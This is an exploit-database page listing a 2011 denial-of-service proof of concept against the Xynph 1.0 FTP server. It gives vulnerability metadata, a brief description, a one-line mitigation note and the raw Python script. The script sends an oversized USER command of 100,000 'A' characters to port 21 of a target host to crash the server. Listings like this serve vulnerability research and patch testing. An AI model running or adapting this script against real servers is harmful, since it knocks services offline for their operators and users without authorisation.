header-logo
Suggest Exploit
vendor:
Xynph 1.0
by:
freak_out
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Xynph 1.0
Affected Version From: 1
Affected Version To: 1
Patch Exists: Yes
Related CWE: N/A
CPE: a:xynph:xynph:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011

Xynph 1.0 USER Denial of Service Exploit

This exploit sends a large amount of data to the USER command of the Xynph 1.0 FTP server, causing it to crash. The exploit is written in Python and can be run from the command line.

Mitigation:

Ensure that the FTP server is running the latest version of Xynph 1.0 and that all security patches have been applied.
Source

Exploit-DB raw data:

# Exploit Title: Xynph 1.0 USER Denial of Service Exploit
# Date: 04.01.2011
# Author: freak_out
# Version: 1.0
# Tested on: Windows XP SP3
# Type: DOS/POC
# Greetings: anco, mahjong, puddy, st!x, war10ck, fraggle, DarthShredder, krzym, starslayer, db
# E-Mail: freak_out@phcn.de

#DoS:
#!/usr/bin/python
import socket
import sys

buf = "A"*100000
host = sys.argv[1]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,21))
print "Send USER " + buf
s.send("USER %s\r\n" % buf)

Navigation

Suggest Exploit

Services By CQR